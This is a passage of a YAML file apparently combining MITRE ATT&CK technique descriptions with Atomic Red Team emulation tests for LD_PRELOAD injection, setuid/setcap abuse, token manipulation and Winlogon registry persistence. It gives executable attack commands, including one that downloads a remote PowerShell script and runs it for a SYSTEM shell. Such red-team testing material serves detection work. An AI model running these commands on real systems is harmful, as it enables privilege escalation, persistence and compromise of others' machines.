command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
SIGINT && kill -SIGINT $$''
'
cleanup_command: 'rm -f /tmp/art-fish.txt
'
name: sh
- name: Trap SIGINT (freebsd)
auto_generated_guid: ade10242-1eac-43df-8412-be0d4c704ada
description: |
Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
The trap executes script that writes to /tmp/art-fish.txt
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if bash is installed.
'
prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y bash)\n"
executor:
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
SIGINT && kill -SIGINT $$''
'
cleanup_command: 'rm -f /tmp/art-fish.txt
'
name: sh
T1574.006:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825
created: '2020-03-13T20:09:59.569Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/006
external_id: T1574.006
- source_name: Apple Doco Archive Dynamic Libraries
description: Apple Inc.. (2012, July 23). Overview of Dynamic Libraries. Retrieved
March 24, 2021.
url: https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html
- source_name: Baeldung LD_PRELOAD
description: baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved
March 24, 2021.
url: https://www.baeldung.com/linux/ld_preload-trick-what-is
- source_name: TheEvilBit DYLD_INSERT_LIBRARIES
description: Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection
in macOS / OSX. Retrieved March 26, 2020.
url: https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/
- source_name: Intezer Symbiote 2022
description: 'Joakim Kennedy and The BlackBerry Threat Research & Intelligence
Team. (2022, June 9). Symbiote Deep-Dive: Analysis of a New, Nearly-Impossible-to-Detect
Linux Threat. Retrieved March 24, 2025.'
url: https://intezer.com/blog/research/new-linux-threat-symbiote/
- source_name: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass
description: Jon Gabilondo. (2019, September 22). How to Inject Code into
Mach-O Apps. Part II.. Retrieved March 24, 2021.
url: https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191
- source_name: Man LD.SO
description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved
June 15, 2020.
url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html
- source_name: Elastic Security Labs Pumakit 2024
description: Remco Sprooten and Ruben Groenewoud. (2024, December 11). Declawing
PUMAKIT. Retrieved March 24, 2025.
url: https://www.elastic.co/security-labs/declawing-pumakit
- source_name: TLDP Shared Libraries
description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved
January 31, 2020.
url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html
- source_name: Timac DYLD_INSERT_LIBRARIES
description: Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES.
Retrieved March 26, 2020.
url: https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/
- source_name: ESET Ebury Oct 2017
description: 'Vachon, F. (2017, October 30). Windigo Still not Windigone:
An Ebury Update . Retrieved February 10, 2021.'
url: https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:51.810Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: |-
Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from various environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) Each platform's linker uses an extensive list of environment variables at different points in execution. These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions in the original library.(Citation: Baeldung LD_PRELOAD)
Hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. On Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. For example, adversaries have used `LD_PRELOAD` to inject a malicious library into every descendant process of the `sshd` daemon, resulting in execution under a legitimate process. When the executing sub-process calls the `execve` function, for example, the malicious library’s `execve` function is executed rather than the system function `execve` contained in the system library on disk. This allows adversaries to [Hide Artifacts](https://attack.mitre.org/techniques/T1564) from detection, as hooking system functions such as `execve` and `readdir` enables malware to scrub its own artifacts from the results of commands such as `ls`, `ldd`, `iptables`, and `dmesg`.(Citation: ESET Ebury Oct 2017)(Citation: Intezer Symbiote 2022)(Citation: Elastic Security Labs Pumakit 2024)
Hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
x_mitre_version: '2.1'
identifier: T1574.006
atomic_tests:
- name: Shared Library Injection via /etc/ld.so.preload
auto_generated_guid: 39cb0e67-dd0d-4b74-a74b-c072db7ae991
description: "This test adds a shared library to the `ld.so.preload` list to
execute and intercept API calls. This technique was used by threat actor Rocke
during the exploitation of Linux web servers. This requires the `glibc` package.\n\nUpon
successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload.
\n"
supported_platforms:
- linux
input_arguments:
path_to_shared_library_source:
description: Path to a shared library source code
type: path
default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c
path_to_shared_library:
description: Path to a shared library object
type: path
default: "/tmp/T1574006.so"
dependency_executor_name: bash
dependencies:
- description: 'The shared library must exist on disk at specified location
(#{path_to_shared_library})
'
prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
'
executor:
command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload''
'
cleanup_command: 'sudo sed -i ''s##{path_to_shared_library}##'' /etc/ld.so.preload
'
name: bash
elevation_required: true
- name: Shared Library Injection via LD_PRELOAD
auto_generated_guid: bc219ff7-789f-4d51-9142-ecae3397deae
description: |
This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout.
supported_platforms:
- linux
input_arguments:
path_to_shared_library_source:
description: Path to a shared library source code
type: path
default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c
path_to_shared_library:
description: Path to a shared library object
type: path
default: "/tmp/T1574006.so"
dependency_executor_name: bash
dependencies:
- description: 'The shared library must exist on disk at specified location
(#{path_to_shared_library})
'
prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
'
executor:
command: 'LD_PRELOAD=#{path_to_shared_library} ls
'
name: bash
- name: Dylib Injection via DYLD_INSERT_LIBRARIES
auto_generated_guid: 4d66029d-7355-43fd-93a4-b63ba92ea1be
description: 'injects a dylib that opens calculator via env variable
'
supported_platforms:
- macos
input_arguments:
file_to_inject:
description: Path of executable to be injected. Mostly works on non-apple
default apps.
type: path
default: "/Applications/Firefox.app/Contents/MacOS/firefox"
source_file:
description: Path of c source file
type: path
default: PathToAtomicsFolder/T1574.006/src/MacOS/T1574.006.c
dylib_file:
description: Path of dylib file
type: path
default: "/tmp/T1574006MOS.dylib"
dependency_executor_name: bash
dependencies:
- description: 'Compile the dylib from (#{source_file}). Destination is #{dylib_file}
'
prereq_command: 'gcc -dynamiclib #{source_file} -o #{dylib_file}
'
get_prereq_command: 'gcc -dynamiclib #{source_file} -o #{dylib_file}
'
executor:
command: 'DYLD_INSERT_LIBRARIES=#{dylib_file} #{file_to_inject}
'
cleanup_command: |
kill `pgrep Calculator`
kill `pgrep firefox`
name: bash
elevation_required: false
T1548:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b
created: '2020-01-30T13:58:14.373Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1548
external_id: T1548
- source_name: TechNet How UAC Works
description: Lich, B. (2016, May 31). How User Account Control Works. Retrieved
June 3, 2016.
url: https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works
- source_name: OSX Keydnap malware
description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware
is hungry for credentials. Retrieved July 3, 2017.
url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/
- source_name: Fortinet Fareit
description: Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses
UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.
url: https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware
- source_name: sudo man page 2018
description: Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.
url: https://www.sudo.ws/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:53.277Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
elevation control mechanisms that are intended to limit privileges that a
user can perform on a machine. Authorization has to be granted to specific
users in order to perform tasks that can be considered of higher risk.(Citation:
TechNet How UAC Works)(Citation: sudo man page 2018) An adversary can perform
several methods to take advantage of built-in control mechanisms in order
to escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation:
Fortinet Fareit)'
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- IaaS
- Office Suite
- Identity Provider
x_mitre_version: '1.5'
atomic_tests: []
T1134.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf
created: '2020-02-18T16:48:56.582Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1134/002
external_id: T1134.002
- source_name: Microsoft Command-line Logging
description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved
April 21, 2017.
url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing
- source_name: Microsoft RunAs
description: Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021.
url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:53.370Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs)
Creating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before being used to create a process.
While this technique is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Vadim Khrykov
- Jonny Johnson
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.3'
identifier: T1134.002
atomic_tests:
- name: Access Token Manipulation
auto_generated_guid: dbf4f5a9-b8e0-46a3-9841-9ad71247239e
description: "This Action demonstrates how an access token for a specific program
can spawn another program under a different owner. \nAdversaries can leverage
access tokens to run programs under a different user not only to achieve privilege
escalation but also to evade detection by blending in with normal user activity.
\nThis Action will query all processes and list the process name and owner.It
will then make a copy of an existing token to create a new instance of cmd.exe\n"
supported_platforms:
- windows
executor:
command: |
Set-ExecutionPolicy -Scope Process Bypass -Force
$owners = @{}
gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
Get-Process | Select ProcessName,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}
& "$PathToAtomicsFolder\T1134.002\src\GetToken.ps1"; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe")
name: powershell
elevation_required: true
- name: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation
technique
auto_generated_guid: ccf4ac39-ec93-42be-9035-90e2f26bcd92
description: Get SYSTEM shell - Pop System Shell using Token Manipulation technique
via function of WinPwn
supported_platforms:
- windows
executor:
command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem
name: powershell
T1548.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9
created: '2020-01-30T14:11:41.212Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1548/001
external_id: T1548.001
- source_name: GTFOBins Suid
description: Emilio Pinna, Andrea Cardaci. (n.d.). GTFOBins. Retrieved January
28, 2022.
url: https://gtfobins.github.io/#+suid
- source_name: OSX Keydnap malware
description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware
is hungry for credentials. Retrieved July 3, 2017.
url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/
- source_name: setuid man page
description: Michael Kerrisk. (2017, September 15). Linux Programmer's Manual.
Retrieved September 21, 2018.
url: http://man7.org/linux/man-pages/man2/setuid.2.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:53.456Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The chmod command can set these bits with bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgid bit, chmod 2775 and chmod g+s can be used.
Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions.
Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
x_mitre_version: '1.2'
identifier: T1548.001
atomic_tests:
- name: Make and modify binary from C source
auto_generated_guid: 896dfe97-ae43-4101-8e96-9a7996555d80
description: 'Make, change owner, and change file attributes on a C source code
file
'
supported_platforms:
- macos
- linux
input_arguments:
payload:
description: hello.c payload
type: path
default: PathToAtomicsFolder/T1548.001/src/hello.c
executor:
command: |
cp #{payload} /tmp/hello.c
sudo chown root /tmp/hello.c
sudo make /tmp/hello
sudo chown root /tmp/hello
sudo chmod u+s /tmp/hello
/tmp/hello
cleanup_command: |
sudo rm /tmp/hello
sudo rm /tmp/hello.c
name: sh
elevation_required: true
- name: Make and modify binary from C source (freebsd)
auto_generated_guid: dd580455-d84b-481b-b8b0-ac96f3b1dc4c
description: 'Make, change owner, and change file attributes on a C source code
file
'
supported_platforms:
- linux
input_arguments:
payload:
description: hello.c payload
type: path
default: PathToAtomicsFolder/T1548.001/src/hello.c
executor:
command: |
cp #{payload} /tmp/hello.c
chown root /tmp/hello.c
make /tmp/hello
chown root /tmp/hello
chmod u+s /tmp/hello
/tmp/hello
cleanup_command: |
rm /tmp/hello
rm /tmp/hello.c
name: sh
elevation_required: true
- name: Set a SetUID flag on file
auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79
description: 'This test sets the SetUID flag on a file in FreeBSD.
'
supported_platforms:
- macos
- linux
input_arguments:
file_to_setuid:
description: Path of file to set SetUID flag
type: path
default: "/tmp/evilBinary"
executor:
command: |
sudo touch #{file_to_setuid}
sudo chown root #{file_to_setuid}
sudo chmod u+xs #{file_to_setuid}
cleanup_command: 'sudo rm #{file_to_setuid}
'
name: sh
elevation_required: true
- name: Set a SetUID flag on file (freebsd)
auto_generated_guid: 9be9b827-ff47-4e1b-bef8-217db6fb7283
description: 'This test sets the SetUID flag on a file in FreeBSD.
'
supported_platforms:
- linux
input_arguments:
file_to_setuid:
description: Path of file to set SetUID flag
type: path
default: "/tmp/evilBinary"
executor:
command: |
touch #{file_to_setuid}
chown root #{file_to_setuid}
chmod u+xs #{file_to_setuid}
cleanup_command: 'rm #{file_to_setuid}
'
name: sh
elevation_required: true
- name: Set a SetGID flag on file
auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c
description: 'This test sets the SetGID flag on a file in Linux and macOS.
'
supported_platforms:
- macos
- linux
input_arguments:
file_to_setuid:
description: Path of file to set SetGID flag
type: path
default: "/tmp/evilBinary"
executor:
command: |
sudo touch #{file_to_setuid}
sudo chown root #{file_to_setuid}
sudo chmod g+xs #{file_to_setuid}
cleanup_command: 'sudo rm #{file_to_setuid}
'
name: sh
elevation_required: true
- name: Set a SetGID flag on file (freebsd)
auto_generated_guid: 1f73af33-62a8-4bf1-bd10-3bea931f2c0d
description: 'This test sets the SetGID flag on a file in FreeBSD.
'
supported_platforms:
- linux
input_arguments:
file_to_setuid:
description: Path of file to set SetGID flag
type: path
default: "/tmp/evilBinary"
executor:
command: |
touch #{file_to_setuid}
chown root #{file_to_setuid}
chmod g+xs #{file_to_setuid}
cleanup_command: 'rm #{file_to_setuid}
'
name: sh
elevation_required: true
- name: Make and modify capabilities of a binary
auto_generated_guid: db53959c-207d-4000-9e7a-cd8eb417e072
description: |
Make and modify [capabilities](https://man7.org/linux/man-pages/man7/capabilities.7.html) of a C source code file.
The binary doesn't have to modify the UID, but the binary is given the capability to arbitrarily modify it at any time with `setuid(0)`.
Without being owned by root, the binary can set the UID to 0.
supported_platforms:
- linux
input_arguments:
payload:
description: cap.c payload
type: path
default: PathToAtomicsFolder/T1548.001/src/cap.c
executor:
command: |
cp #{payload} /tmp/cap.c
make /tmp/cap
sudo setcap cap_setuid=ep /tmp/cap
/tmp/cap
cleanup_command: |
rm /tmp/cap
rm /tmp/cap.c
name: sh
elevation_required: true
- name: Provide the SetUID capability to a file
auto_generated_guid: 1ac3272f-9bcf-443a-9888-4b1d3de785c1
description: 'This test gives a file the capability to set UID without using
flags.
'
supported_platforms:
- linux
input_arguments:
file_to_setcap:
description: Path of file to provide the SetUID capability
type: path
default: "/tmp/evilBinary"
executor:
command: |
touch #{file_to_setcap}
sudo setcap cap_setuid=ep #{file_to_setcap}
cleanup_command: 'rm #{file_to_setcap}
'
name: sh
elevation_required: true
- name: Do reconnaissance for files that have the setuid bit set
auto_generated_guid: 8e36da01-cd29-45fd-be72-8a0fcaad4481
description: 'This test simulates a command that can be run to enumerate files
that have the setuid bit set
'
supported_platforms:
- linux
executor:
command: 'find /usr/bin -perm -4000
'
name: sh
- name: Do reconnaissance for files that have the setgid bit set
auto_generated_guid: 3fb46e17-f337-4c14-9f9a-a471946533e2
description: 'This test simulates a command that can be run to enumerate files
that have the setgid bit set
'
supported_platforms:
- linux
executor:
command: 'find /usr/bin -perm -2000
'
name: sh
T1547.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35
created: '2020-01-24T16:59:59.688Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547/004
external_id: T1547.004
- source_name: Cylance Reg Persistence Sept 2013
description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence,
Part 2: The Run Keys and Search-Order. Retrieved November 17, 2024.'
url: https://web.archive.org/web/20160214140250/http://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:53.539Z'
name: 'Boot or Logon Autostart Execution: Winlogon Helper DLL'
description: "Adversaries may abuse features of Winlogon to execute DLLs and/or
executables when a user logs in. Winlogon.exe is a Windows component responsible
for actions at logon/logoff as well as the secure attention sequence (SAS)
triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows
NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows
NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper
programs and functionalities that support Winlogon.(Citation: Cylance Reg
Persistence Sept 2013) \n\nMalicious modifications to these Registry keys
may cause Winlogon to load and execute malicious DLLs and/or executables.
Specifically, the following subkeys have been known to be possibly vulnerable
to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify
- points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit
- points to userinit.exe, the user initialization program executed when a
user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell
executed when a user logs on\n\nAdversaries may take advantage of these features
to repeatedly execute malicious code and establish persistence."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Praetorian
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.3'
identifier: T1547.004
atomic_tests:
- name: Winlogon Shell Key Persistence - PowerShell
auto_generated_guid: bf9f9d65-ee4d-4c3e-a843-777d04f19c38
description: |
PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
supported_platforms:
- windows
input_arguments:
binary_to_execute:
description: Path of binary to execute
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Shell" "explorer.exe, #{binary_to_execute}" -Force
'
cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
'
name: powershell
- name: Winlogon Userinit Key Persistence - PowerShell
auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb
description: |
PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
supported_platforms:
- windows
input_arguments:
binary_to_execute:
description: Path of binary to execute
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Userinit" "Userinit.exe, #{binary_to_execute}" -Force
'
cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
'
name: powershell
- name: Winlogon Notify Key Logon Persistence - PowerShell
auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9
description: |
PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon.
Please note that Winlogon Notifications have been removed as of Windows Vista / Windows Server 2008 and that this test thus only applies to erlier versions of Windows.
supported_platforms:
- windows
input_arguments:
binary_to_execute:
description: Path of notification package to execute
type: path
default: C:\Windows\Temp\atomicNotificationPackage.dll
function_to_execute:
description: Function in notification package to execute
type: string
default: AtomicTestFunction
executor:
command: |
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "DllName" "#{binary_to_execute}" -Type ExpandString -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Logon" "#{function_to_execute}" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Impersonate" 1 -Type DWord -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Asynchronous" 0 -Type DWord -Force
cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
-Force -ErrorAction Ignore
'
name: powershell
- name: Winlogon HKLM Shell Key Persistence - PowerShell
auto_generated_guid: 95a3c42f-8c88-4952-ad60-13b81d929a9d
description: |
PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
supported_platforms:
- windows
input_arguments:
binary_to_execute:
description: Path of binary to execute
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: 'Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Shell" "explorer.exe, #{binary_to_execute}" -Force
'
cleanup_command: 'Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
'
name: powershell
- name: Winlogon HKLM Userinit Key Persistence - PowerShell
auto_generated_guid: f9b8daff-8fa7-4e6a-a1a7-7c14675a545b
description: |
PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
supported_platforms:
- windows
input_arguments:
binary_to_execute:
description: Path of binary to execute
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: 'Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Userinit" "Userinit.exe, #{binary_to_execute}" -Force
'
cleanup_command: 'Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
'
name: powershell
T1098.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4
